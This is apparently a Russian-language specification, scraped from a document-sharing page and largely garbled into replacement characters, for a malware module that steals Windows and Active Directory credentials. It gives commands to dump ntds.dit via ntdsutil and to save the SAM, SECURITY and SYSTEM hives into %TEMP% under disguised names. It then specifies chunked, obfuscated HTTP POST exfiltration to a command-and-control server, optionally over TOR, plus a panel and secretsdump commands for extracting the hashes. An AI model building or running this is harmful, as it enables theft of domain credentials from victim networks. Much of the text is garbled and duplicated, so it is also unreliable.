ТЗ дамп пользователей Windows и AD

�� ACTIVE DIRECTORY � �� WINDOWS
��
��
�� Active Directory � �� , ��

�� .
��
�� `ntdsutil' �� .

�� , ��
�� impacket / secretsdump.py
�� Active Directory �� :
https://devteev.blogspot.com/2014/04/hacking-tricks-easy-way-to-get-ntdsdit.html
�� HKLM/SAM, HKLM/Security � HKLM/System.
��
��

modules_HOWTO.
�� /�� - ADll.
�� , �� SYSTEM.
* �� , �� Active

Directory.
* �� , �� "AD not found" � �� .
* ��, �� , �� Volume Shadow Copy �� WinAPI
(�� sc query vss), � �� , �� (��) �� .
* �� .

�� 4:
ntds.dit
sam.dump
security.dump
system.dump
�� :

<prefix>0.dat
<prefix>1.dat
<prefix>2.dat
<prefix>3.dat
�� ParentInfo.ParentID (��. module_HOWTO) �

�� :
- ��
- ��
- ��
- �� -�� (��
�� )
- �� .
�� :

- �� 64-�� (�� unsigned) ��
ParentInfo.ParentID
- 64-�� unsigned char filename[8]
- �� , �� 'a', �� 'a'
- �� , �� 'Z', �� 'Z'
�� , �� , ��
�� , �� .
�� .
* �� %TEMP%

�� (�) ��, �� .
�� - �� , ��,
�� ,
� �� .
* ��
ntdsutil "ac in ntds" "ifm" "cr fu %temp%\<prefix>0.dat" q q
�� , �� WinAPI
(�� ; � �� ).
* �� HKLM/SAM, HKLM/Security � HKLM/System ��
reg save hklm\sam %temp%\somepath\<prefix>1.dat

reg save hklm\security %temp%\somepath\<prefix>2.dat
reg save hklm\system %temp%\somepath\<prefix>3.dat
* ��

(��.��.��).
�� (��,
�� ).
�� (��) chunksize. ��
�� - 10�.
�� (��.��).

�� , ��
�� TIMEOUT_MIN...TIMEOUT_MAX
(�� ). �� .
�� (�� ; �� , �� HTTP 200
OK; �� ),
�� (�� ), ��
�� ,
� �� .
�� , ��
WantRelease � ��
while(1) Sleep(1000);
� ��, �� .
��
� �� srvad.

�� , � �� \r\n.
�� - �� URL, �� .
�� http �� https, �� URL ��.
�� , �� http, �� - �� https.
�� TOR.

�� TOR �� .
��
�� :

- �� -��
- �� .
1) �� HTTP POST � ��

multipart/form-data (�� html-��).
POST �� :
timestamp - �� UNIX-��
ip - �� ParentInfo.SelfIP (��. module_HOWTO)
ip1 - ��
ip2 - ��
...
ipN - �� N-��
cid - �� ParentInfo.ParentID (��. module_HOWTO)
group - �� ParentInfo.ParentGroup (��. module_HOWTO)
hostname - �� , �� GetComputerName()
source - �� `ntds'
�� url ��:

http://foo.com/<junk>/<auth>/<junk>
junk - �� , �� URI, �� /
auth - �� . ��, �� ,
�� .
�� - �� .
� �� :
- �� Z � ��
- �� (�� !) � 6 �� 15-� �� 31.
�� - ��. � �� Z.
�� - abcde7ol7k9hi8mZ
2) �� , �� HTTP POST, � ��

multipart/form-data.
�� file.
�� Content-Disposition; �� URI
��.
�� :
- �� . � ��, �� 100�, ��
�� 10� ��.
- �� , �� - ��
�� , �� .
�� , �� , �
�� .
�� SetEndOfFile().
- �� , ��
gzip.
- �� URL ��
http://foo.com/<junk>/<auth>/<cid>/<filename>/<start>/<end>/<eof>
��
junk - �� , �� URI, �� /
auth - �� . �� - �� , � ��
- �� S � ��
- �� (�� !) � 8 �� 15-� �� 25.
filename - �� ;
start - �� ; ��
�� , � ��.
�� , � �� .
��, 0A -- �� 0 (�� 0 ��, �� A ��).
end - �� ; ��
��, �� start.
��, 3A5A2A3A9A5A9A - �� 3523959.
eof - �� . �� , �� ; � ��
(�� )
�� , � �� :
- �� 0
- �� A �� F
�� (�� ) �� :

0 - ntds.dit
1 - sam.dump
2 - security.dump
3 - system.dump
�� , �� HTTP-�� 200 �� ,

�� -200 �� (��, 50* �� 40* �� ).
�� XML � �� HTTP-��, ��
<response>.
�� 4041, �� 1 - ��
�� (�� ).
��, �� 9:
HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Oct 2019 13:08:44 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept
<?xml version="1.0" encoding="UTF-8"?>

<response>4049</response>
�� - �� , ��

HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Mon, 07 Oct 2019 13:08:44 GMT
Content-Type: application/xml; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept
<?xml version="1.0" encoding="UTF-8"?>

<response>200</response>
��
�� .

�� - �� .
�� :
�� | ClientID| Group | IP | Hostname | Total Size
� ��.
�� - �� ClientID (��.��

��).
�� :

- �� (�� )
- ClientID
- Group
- IP
- Hostname
- Total Size (�� )
�� - ��.

�� -�� (var
$issledovanie - ��; var $research - ��).
� �� .
�� ; �� (��
"�� ?" �� ).
�� .
�� .
� �� , �� ; ��
�� .
� �� "�� ".

�� , �� "��" �� (��
��).
�� Active Directory �� :
sudo ./secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local
�� ntds.dit � SYSTEM - ��

result - ��
�� :
secretsdump.py -sam sam.dump -security security.dump -system system.dump LOCAL
�� , �� :

- �� -�� ntds.dit, sam.dump,
security.dump, system.dump
(�� )
- �� , ��
- �� stdout, stderr ��
- �� "�� ", �� , �
�� .txt �� .zip.
�� , �� .
***
�� :

pip
pip install impacket
pip install impacket --upgrade (if needed)
pip install pycrypto (--upgrade if needed)
pip install pyasn1 (if needed)
apt-get install python-dev (if needed)
API ��
�� API �� :
POST /api/v1/hello HTTP/1.1
�� .

��
(��. �� ).
POST /api/v1/savef/<cid>/<filename>/<start>/<end>/e
�� (��. �� ).
�� 200 - ��.

�� 200 - ��. �� API.
�� , ��
�� (�� ).
�� . ��
��, �� :
ntds.dit
sam.dump
security.dump
system.dump
�� /�� -�� .
��!
�� 4 (��!) ��.
�� (� �� ).
��, �� , ��
cid.
��, �� .
�� "��" ��
�� "��" ��, �� .
�� (/log/1234) ��
�� , ��
injectDll
pwgrab
importDll
��
�� , ��
�� (�� ).
��
�� (�.�. �� ).
�� .
�.�. �� , ��
�� , �� .

ТЗ дамп пользователей Windows и AD

Загружено:

Сведения о документе

Авторское право

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

ТЗ дамп пользователей Windows и AD

Загружено:

Авторское право:

������ ����� �� ACTIVE DIRECTORY � ��������� ������� ������� WINDOWS

�������� ������ �� �� Active Directory � ��������� ������� �������, ���������� �

������ ���������� ������ ������� `ntdsutil' �� �������� ��.

����� ������ ������ ���� ����� ������� HKLM/SAM, HKLM/Security � HKLM/System.

��������� ������ ���� ��������� � ���� ����� � ������������ � ����������

* ����� ������� ������ ������� ���������, ������ �� �� ��������� ������ Active

* ���� ���, ��������� ��������� "AD not found" � ��������� ������.

* ����� ��������� ����� ������ �����.

������ � �������� ������� ��� ����� ������ ����� ������ �����:

������� ������ ������������ ��� ��� ������ ParentInfo.ParentID (��. module_HOWTO) �

����� ���������� ����� ��������:

������ ����� ��������� �� �������������.

* ������ �������� ������� ��� �� ������ �� ���� ������ � �������� %TEMP%

* ����� ����� ��������� �������

ntdsutil "ac in ntds" "ifm" "cr fu %temp%\<prefix>0.dat" q q

* ������ ���� ����� ������� HKLM/SAM, HKLM/Security � HKLM/System ���������

reg save hklm\sam %temp%\somepath\<prefix>1.dat

* ���������� ����� ����� ������ �������� �� ��������� �������� ������

������ �������� ������ �� ������� ��������� ������� (��.����).

� ��������, ��� ������������ ������� �������� ������ �����.

� ����� ������������ ������ � ��������� srvad.

�� ������ ������ ������������� ������ ����� ������ TOR.

�������� �������� ������

�������� �������� ������ ������������ �������� ����������:

1) �� ������ ���������� ������� ��������� � ��������� ����� HTTP POST � ����������

�������� ���������� �� url ����:

2) ����� ���������� ������ ���� �� �����, �������� HTTP POST, � ����������

��������� ������ ����� ����� (�� ���������) ����� �������� ��������:

��� ��������� ������, ��� HTTP-������ 200 �� ������� �� ������ ��������,

��������, �������� ����� ��������������� �� ������ � ����� 9:

<?xml version="1.0" encoding="UTF-8"?>

�������� ����� - ������ ����, ��� ��

<?xml version="1.0" encoding="UTF-8"?>

������������� ���������� ������ ����� ������������ ����� �������.

�������� | ClientID| Group | IP | Hostname | Total Size

�������� - �� ���������� ������ �� ���������� ClientID (��.���� � �����������

������������� ��������� �� ����:

���� ���������� - ����������.

� ������ ������ ���� ���������� �� ���� ���������.

� �������� ������ ������ ���� ������ "������ ������".

������ ������ Active Directory ���������� ����� ������� ���� ��������:

sudo ./secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local

��� ntds.dit � SYSTEM - ��� �������������� ����� �� ����������� �� ������� ������

������ ��������� ������� �������:

secretsdump.py -sam sam.dump -security security.dump -system system.dump LOCAL

��� ����, ������� ������:

��������� ������� �� ������ �������� �������:

pip install pycrypto (--upgrade if needed)

pip install pyasn1 (if needed)

apt-get install python-dev (if needed)

������� ������ ��������� API �� �������� ������ �� �������:

POST /api/v1/hello HTTP/1.1

���� ������ ������� ���� �������� ������ � ����������� �� ����������� �������.

��� ������ 200 - ��.

��� ���������� ������ � ��/�� ���� ����� �������� ����-���� �� �������.

����������� "������" �������

Похожие интересы

Вам также может понравиться

�� ACTIVE DIRECTORY � �� WINDOWS

�� Active Directory � �� , ��

�� `ntdsutil' �� .

�� HKLM/SAM, HKLM/Security � HKLM/System.

��

* �� , �� Active

* �� , �� "AD not found" � �� .

* �� .

�� :

�� ParentInfo.ParentID (��. module_HOWTO) �

�� :

�� .

* �� %TEMP%

* ��

* �� HKLM/SAM, HKLM/Security � HKLM/System ��

* ��

�� (��.��).

� ��, �� .

� �� srvad.

�� TOR.

��

�� :

1) �� HTTP POST � ��

�� url ��:

2) �� , �� HTTP POST, � ��

�� (�� ) �� :

�� , �� HTTP-�� 200 �� ,

��, �� 9:

�� - �� , ��

�� .

�� | ClientID| Group | IP | Hostname | Total Size

�� - �� ClientID (��.��

�� :

�� - ��.

� �� .

� �� "�� ".

�� Active Directory �� :

�� ntds.dit � SYSTEM - ��

�� :

�� , �� :

�� :

�� API �� :

�� .

�� 200 - ��.

�� /�� -�� .

�� "��" ��